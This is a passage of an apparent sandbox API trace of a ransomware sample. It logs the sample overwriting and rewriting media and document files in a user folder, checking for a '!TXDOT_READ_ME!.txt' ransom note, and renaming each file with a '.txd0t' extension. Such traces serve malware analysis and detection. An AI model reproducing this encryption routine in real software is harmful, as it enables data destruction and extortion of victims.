psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t" [0072.516] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t") returned 0 [0072.517] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv", dwFileAttributes=0x80) returned 1 [0072.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\st1k.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.517] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=79157) returned 1 [0072.517] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.517] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.518] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec8cb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.518] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x13530, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x13530, lpOverlapped=0x0) returned 1 [0072.519] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffecad0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.519] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x13530, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x13530, lpOverlapped=0x0) returned 1 [0072.520] FlushFileBuffers (hFile=0x47c) returned 1 [0072.526] GetProcessHeap () returned 0xe30000 [0072.526] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xe9d750 [0072.534] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" [0072.534] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv") returned="sT1K.flv" [0072.534] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.534] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.534] GetProcessHeap () returned 0xe30000 [0072.534] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.534] CloseHandle (hObject=0x47c) returned 1 [0072.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\st1k.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\st1k.flv.txd0t")) returned 1 [0072.537] SetEvent (hEvent=0x3f8) returned 1 [0072.537] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.539] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" [0072.539] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t" [0072.539] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t") returned 0 [0072.539] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a", dwFileAttributes=0x80) returned 1 [0072.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u9jihqltnvjbusuu8m.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.542] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=8746) returned 1 [0072.543] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.543] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.543] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffdbd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.543] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x2220, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x2220, lpOverlapped=0x0) returned 1 [0072.543] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffdde0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.543] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x2220, lpOverlapped=0x0) returned 1 [0072.543] FlushFileBuffers (hFile=0x47c) returned 1 [0072.554] GetProcessHeap () returned 0xe30000 [0072.554] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xe9b648 [0072.554] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" [0072.554] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a") returned="U9jIHqltNvJBusuu8M.m4a" [0072.554] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.554] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.554] GetProcessHeap () returned 0xe30000 [0072.554] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.555] CloseHandle (hObject=0x47c) returned 1 [0072.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u9jihqltnvjbusuu8m.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u9jihqltnvjbusuu8m.m4a.txd0t")) returned 1 [0072.556] SetEvent (hEvent=0x3f8) returned 1 [0072.556] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.604] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" [0072.604] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t" [0072.604] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t") returned 0 [0072.604] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3", dwFileAttributes=0x80) returned 1 [0072.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uffu-nqwob7xyhy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x470 [0072.605] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=4289) returned 1 [0072.605] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.605] WriteFile (in: hFile=0x470, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.605] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xffffed3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.605] ReadFile (in: hFile=0x470, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x10c0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x10c0, lpOverlapped=0x0) returned 1 [0072.605] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xffffef40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.606] WriteFile (in: hFile=0x470, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x10c0, lpOverlapped=0x0) returned 1 [0072.606] FlushFileBuffers (hFile=0x470) returned 1 [0072.608] GetProcessHeap () returned 0xe30000 [0072.608] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1ec0 [0072.608] StrCpyW (in: psz1=0xed1ec0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" [0072.608] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3") returned="UFfU-NQWoB7XyHy.mp3" [0072.608] StrCpyW (in: psz1=0xed1f08, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.608] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.608] GetProcessHeap () returned 0xe30000 [0072.608] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1ec0 | out: hHeap=0xe30000) returned 1 [0072.608] CloseHandle (hObject=0x470) returned 1 [0072.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uffu-nqwob7xyhy.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uffu-nqwob7xyhy.mp3.txd0t")) returned 1 [0072.611] SetEvent (hEvent=0x3f8) returned 1 [0072.611] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.612] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" [0072.612] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t" [0072.612] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t") returned 0 [0072.613] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp", dwFileAttributes=0x80) returned 1 [0072.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wl6ctwval-45s.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x470 [0072.613] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=84259) returned 1 [0072.613] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.613] WriteFile (in: hFile=0x470, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.613] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffeb4dd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.613] ReadFile (in: hFile=0x470, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x14920, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x14920, lpOverlapped=0x0) returned 1 [0072.615] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffeb6e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.615] WriteFile (in: hFile=0x470, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x14920, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x14920, lpOverlapped=0x0) returned 1 [0072.616] FlushFileBuffers (hFile=0x470) returned 1 [0072.619] GetProcessHeap () returned 0xe30000 [0072.619] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1d98 [0072.619] StrCpyW (in: psz1=0xed1d98, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" [0072.619] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp") returned="wL6CtWVaL-45s.odp" [0072.619] StrCpyW (in: psz1=0xed1de0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.619] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.619] GetProcessHeap () returned 0xe30000 [0072.619] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1d98 | out: hHeap=0xe30000) returned 1 [0072.619] CloseHandle (hObject=0x470) returned 1 [0072.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wl6ctwval-45s.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wl6ctwval-45s.odp.txd0t")) returned 1 [0072.622] SetEvent (hEvent=0x3f8) returned 1 [0072.622] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.622] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" [0072.622] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t" [0072.622] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t") returned 0 [0072.623] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf", dwFileAttributes=0x80) returned 1 [0072.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xqhhuyjjl0u.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x470 [0072.623] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=35457) returned 1 [0072.623] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.623] WriteFile (in: hFile=0x470, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.623] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xffff737f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.623] ReadFile (in: hFile=0x470, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x8a80, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x8a80, lpOverlapped=0x0) returned 1 [0072.624] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xffff7580, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.624] WriteFile (in: hFile=0x470, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x8a80, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x8a80, lpOverlapped=0x0) returned 1 [0072.624] FlushFileBuffers (hFile=0x470) returned 1 [0072.627] GetProcessHeap () returned 0xe30000 [0072.627] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed28a0 [0072.627] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" [0072.627] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf") returned="XqhhUYjJL0U.rtf" [0072.627] StrCpyW (in: psz1=0xed28e8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.627] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.627] GetProcessHeap () returned 0xe30000 [0072.627] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0072.627] CloseHandle (hObject=0x470) returned 1 [0072.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xqhhuyjjl0u.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xqhhuyjjl0u.rtf.txd0t")) returned 1 [0072.629] SetEvent (hEvent=0x3f8) returned 1 [0072.629] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.630] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" [0072.630] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t" [0072.630] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t") returned 0 [0072.630] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3", dwFileAttributes=0x80) returned 1 [0072.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ydxefffc99vgn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x470 [0072.630] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=71319) returned 1 [0072.630] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.630] WriteFile (in: hFile=0x470, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.631] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffee769, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.631] ReadFile (in: hFile=0x470, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11690, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x11690, lpOverlapped=0x0) returned 1 [0072.632] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffee970, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.632] WriteFile (in: hFile=0x470, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11690, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x11690, lpOverlapped=0x0) returned 1 [0072.632] FlushFileBuffers (hFile=0x470) returned 1 [0072.635] GetProcessHeap () returned 0xe30000 [0072.635] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1208 [0072.635] StrCpyW (in: psz1=0xed1208, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" [0072.635] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3") returned="YDXeffFC99vGn.mp3" [0072.635] StrCpyW (in: psz1=0xed1250, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.635] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.635] GetProcessHeap () returned 0xe30000 [0072.635] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1208 | out: hHeap=0xe30000) returned 1 [0072.635] CloseHandle (hObject=0x470) returned 1 [0072.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ydxefffc99vgn.mp3"), 